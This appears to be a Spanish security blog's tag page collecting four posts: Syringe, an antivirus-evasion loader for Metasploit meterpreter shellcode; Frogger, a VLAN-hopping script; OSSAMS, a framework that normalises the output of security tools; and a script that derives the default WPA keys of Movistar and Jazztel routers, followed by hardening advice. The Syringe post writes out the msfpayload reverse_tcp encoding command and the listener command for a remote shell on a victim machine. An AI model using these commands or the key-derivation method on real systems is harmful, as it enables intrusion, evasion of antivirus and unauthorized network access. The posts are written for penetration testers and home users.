Mostrando entradas con la etiqueta Script. Mostrar todas las entradas
Mostrando entradas con la etiqueta Script. Mostrar todas las entradas
















Hace un tiempo publique una serie de tres artículos sobre las diferentes forma de crear un fichero ejecutable  (exe) con capacidad de evasión del sistema Antivirus utilizando el framework de seguridad #Metasploit. 

En su momento estuve tentado de crear un script que generase un ejecutable con un PAYLOAD según unas especificaciones previas, y  que automáticamente comprobase en Virustotal su eficacia. Ahora, buceando en Internet he ido a parar a http://www.commonexploits.com quién ha creado precisamente un script que realiza exactamente eso, es decir, generar un payload con metasploit con técnicas de evasión de antivirus.

Sin embargo, aunque el script (AV0id) es muy interesante, ese mismo artículo me ha puesto sobre la pista de una herramienta de gran utilidad,  cuyo objetivo es evadir (bypass) los sistema antivirus. Es precisamente sobre esto ultimo de lo que voy a hablar a continuación.

¿Qué es syringe?

Durante un test de penetración puede resultar muy útil disponer algún ejecutable con capacidad de "puerta trasera" (backdoor) con el que demostrar la debilidad encontrada tomando el control del equipo objeto del análisis. Es en este punto donde entra en juego el Syringe creado por un investigador de Seguridad independiente llamado Hasan (aka inf0g33k). Hasan publica un documento técnico (PDF) donde explica la técnica que utiliza para cargar la shell, generada con Metasploit, en memoria y demuestra con un ejemplo su funcionamiento.

La herramienta, básicamente carga en memoria un PAYLOAD de tipo meterpreter generado por Metasploit, utilizando técnicas de ENCODING de forma que pueda evadir el sistema Antivirus del sistema. (Asunto que ya se ha tratado en otra ocasión en el blog).

¿Cómo funciona?

Esta herramienta, syringe, utiliza la función VirtualAlloc para reservar una región de la memoria en Windows con permisos de ejecución específicos (read and write). Esta función requiere que el shell code este formado con caracteres alfanuméricos para que puede ser ejecutado. 



Para generar el código (shellcode) utiliza el framework Metasploit, luego genera un ejecutable utilizando la herramienta 7z y una serie de bash script,  fragmento de código en visual basic script (vbs) simplemente es para oculta el terminal de consola durante la ejecución del bash script. Cómo nota de interes, el autor, en su herramienta syringe introduce el código (shellcode) en un bloque estructurado del tipo SEH (Structured Exception Handler) que será el que habilite la ejecución del código (shellcode) de forma exitosa, a través de la función VirtualAlloc.

Los parámetros utilizado para generar el PAYLOAD son:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=IP_KalinLinux R | msfencode -a x86 -e
x86/alpha_mixed -t raw BufferRegister=EAX

Una vez creado el ejecutable SFX, se debe de iniciar un servidor que gestione las conexiones en el puerto 4444 del shellcode generado, esto se hace tal y como se vio en mi artículo sobre Metasploit, de forma que:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
EXITFUhread LPORT=4444 LHOST=IP_KaliLinux E
Llegados a este punto, solo es necesario ejecutar el fichero SFX (exe) generado [bash script makeExeFromBat.bat] y tendremos una sesión de meterpreter sobre el equipo de la victima.

Download


LicenciaGNU GPL v3

Fichero: Syringe_Pack
SHA: b720d32f2ad43defab223d85646ac6b3786f9de7



Referencias:

Via: @teamcymru





¿Qué es Frogger?

Es un script creado por commonexploits.com para automatizar el proceso de auditoria de infraestructuras de redes con segmentación mediante VLAN. Este script facilita y automatiza la tarea de descubrimiento de VLAN (enumeration) y la ejecución de diferentes tipo de ataques.
VLAN es un método de crear redes lógicamente independientes dentro de una misma red física [Wikipedia]
Por supuesto, para utilizar este script en una red propiedad de terceros, se debe de contar con la autorización correspondiente, en caso contrario, utilizar este script solamente en vuestra propia infraestructura de red.

¿Cómo funciona?

El script ha sido creado para automatizar el proceso de descubrimiento de la VLAN y su identificador, así como la preparación para realizar un posterior ataque sobre las VLAN de interes. Este proceso se suele realizar de forma manual, utilizando un sniffer, yersinia, arpscan, etc. Con este script puede ahorrarse tiempo al realizar el proceso de forma automática.

Este script, necesita de las herramientas anteriormente mencionadas para poder funcionar, ya que se limita a automatizar el proceso y utilización de las mismas. Por ello, para comprender y saber utilizar adecuadamente este script es fundamental conocer el funcionamiento de todas las herramientas que intervienen.

El script automatiza las siguientes tareas:
  • Analiza el tráfico de red en busca de paquetes CDP, y extrae la siguiente información (VTP domain name, VLAN management address, Native VLAN ID and IOS version of Cisco devices). 
  •  Activación del DTP Trunk attack de forma automática. 
  •  Analiza el tráfico de red en busca de paquetes STP para extraer las etiquetas 802.1Q VLAN e identificar sus correspondientes IDs. 
  •  Con los IDs VLAN se inicia un descubrimiento de equipos activos en la red con ayuda de arp-scan. 
  •  Se creará automáticamente una interfaz de red VLAN para poder conectarse ala VLAN seleccionada. 

Según el autor el script ha sido probado con éxito en una distribución BackTrack, en particular la BT5. Se necesita la versión de arp-scan version 1.8 con soporte tagged VLAN ID [2]. << Puedo confirmar que efectivamente el script funciona en BT5, siendo necesario descargar e instalar el arp-scan 1.8 >>

Download ARP-SCAN: http://www.nta-monitor.com/files/arp-scan/arp-scan-1.8.tar.gz

root@ST2Labs~# ./confgure
root@ST2Labs~# make && make install

Y todo listo, ya podéis descargar el script frogger.sh y empezar a jugar!




(19/12/12) 1.4 uploaded. 4x faster at CDP scanning, thanks to Bernardo Damele for code improvements. Other improvements made to improve the easy of use.
(18/5/12) 1.2 uploaded, 1.1 was the wrong version I uploaded :/). 1.2 lists VLAN ID’s in a better way.
MD5 Checksum: be20d89fe0c7f49b3dacd818d55628be

Referencias:
[1] Frogger – VLAN Hopping Script
[2] ARPSCAN with tagged VLAN ID support



OSSAMS es un framework, aún en fase de desarrollo, creado Cody Dumont, Adrien de Beaupre y Darryl Williams.

Este proyecto ha sido concebido para solucionar el problema de tener que correlar manualmente las salidas y/o resultados de las herramientas de seguridad durante las pruebas de seguridad de un Sistema (Auditorías, Test de penetración, etc). Es un framework a través del cual podremos guardar distintos ficheros de configuración, ficheros de resultados de las herramientas, etc. dentro de una misma base de datos para poder normalizar los datos y analizar mejor el riesgo de los sistemas de información.

OSSAMS es un framework que proporciona un conjunto de herramienta que facilita a los analista de seguridad la correlación y normalización de la información obtenida durante las auditorías, test de penetración y/o análisis de vulnerabilidades.

¿Cómo funciona?

Se basa fundamentalmente en un conjunto de "herramientas" que automatizan el proceso de adaptar, homogeneizar y normalizar los resultados que proporcionan las diferentes herramientas de seguridad, de forma que se tengan todas las "salidas" del análisis de Seguridad en el mismo formato y en un mismo lugar.

Una vez "parseadas" (formateadas/normalizadas) todas las salidas, estas se almacenan en una base de datos (MYSQL) diseñada según el formato normalizado, que presenta el siguiente esquema de diseño relacional:


El framework OSSAMS, extrae la información que proporcionar cada herramienta de seguridad de una forma estructurada y organizada (XML), y las almacena en una Base de Datos (BD) según el esquema de diseño anterior [2].

¿Herramientas soportadas por OSSSAMS?

OSSAMS permite la estructuración homogénea y normalizada de la información que proporcionan las herramientas de seguridad, se debe ir analizando cada una de las salidas (resultados) de las herramientas y realizar la adaptación y/o tratamiento de los datos necesaria (parser en ingles). Es decir, a medida que  avanza el proyecto se van incluyendo nuevas herramientas soportadas por el sistema de normalización del framework. 

Hasta el momento las herramientas de seguridad soportadas por OSSAMS son:

acunetix, burp, grendel, nessus, netsparker, nexpose community, nikto, nmap, ratproxy, retina community, skipfish, sslscan, w3af, wapiti, watcher,  websecurify, zap.

ROAPMAP (proximos pasos):

Appscan, arachni, core impact, fierce, httprint, iss, languard, metasploit, ncircle, nexpose, n-stalker, ntospider, openvas, proxystrike, retina, saint, sandcat, webcruiser, webinspect, wsfuzzer ....

Código Fuente OSSAMS

Es un código "alpha" en fase de desarrollo, que acaba de empezar pero es muy prometedor, a continuación os dejo los enlaces para su descarga:

  • ossams-parser-SecTor-2011 - Initial Python Parsers into MySQL Database by OSSAMS Python parsing scripts for Release at SecTor 2011 by Adrien de Beaupre
  • get-AD-ACL-v02  – PowerShell script to audit DACLs within AD, ALPHA Code by Cody Dumont
Referencias:

El equipo de NoSecNofun a través de su Blog han publicado un script mediante el cuál se puede romper la seguridad de las redes inalámbricas que vienen instaladas por defecto en los router wifi que regala Movistar y Jazztel, con el alta del ADSL.

Estos router tiene una red inalámbrica configurada por defecto con el nombre (ESSID) característico de WLAN_XXXX (Movistar) y/o JAZZTEL_XXXX (Jazztel), es precisamente esta característica la que permite averiguar la clave (WPA).

El método, descubierto inicialmente SeguridadWireless no estuvo accesible libremente hasta que elvecinoo descubrió el método y lo publico en su Blog. Éste consiste en utilizar los 4 dígitos del nombre de la red inalámbrica (ESSID) que junto con los datos de la BSSID (dirección MAC de la interfaz inalámbrica del router) y un proceso de cifrado (MD5) se genera la clave que llevan configurada por defecto los router. Con estos datos, el script facilita el cálculo automático de la clave WPA que tienen esos router configurado. [Más detalles técnicos del método]

Solución

Esto se puede evitar realizando las siguientes acciones básicas:

  1. Lo primero que debemos de hacer el cambiar la contraseña de la red inalámbrica.
  2. Cambiar el nombre de la red inalámbrica (ESSID).

 Pero ya que nos encontramos dispuestos a mejorar la seguridad inalámbrica de nuestro hogar, sigue nuestro consejo y configura el router de la siguiente forma:

1.- Cambiar el nivel de Seguridad de tu red inalámbrica (Wifi) de WPA a WPA2+AES.
2.- Establece una clave con la siguiente política de contraseñas:

  • Longitud de al menos 20 caracteres.
  • La contraseña debe contener al menos 2 caracteres especiales, 3 valores numéricos, 3 mayúsculas.

3.- Cambiar el nombre de la red inalámbrica (ESSID), éste no debe de contener información personal (nombre, calle, apellidos, teléfonos, etc). La longitud puede ser corta (no importa).

4.- Por ultimo, puedes activar el filtro por direcciones MAC, para ponerlo algo más difícil a los intrusos (recuerda que si tienes esto activo cualquier invitado que tengas deberá de estar dado de alta para poder usar la red inalámbrica de casa).

Para realizar estos pasos debes de tener acceso directo a la configuración de router inalámbrico, te recomiendo que te pases por el los foros de http://www.adslzone.net y http://www.adslayuda.com para consultar los tutoriales de configuración.

Recuerda: El tutorial de configuración dependerá del modelo exacto del router que tengas en casa. Ejemplo: Movistar - modelo Zyxel_XXX

Fuente: twitter @nosecnofun

Designed with by Way2themes | Distributed by Blogspot Themes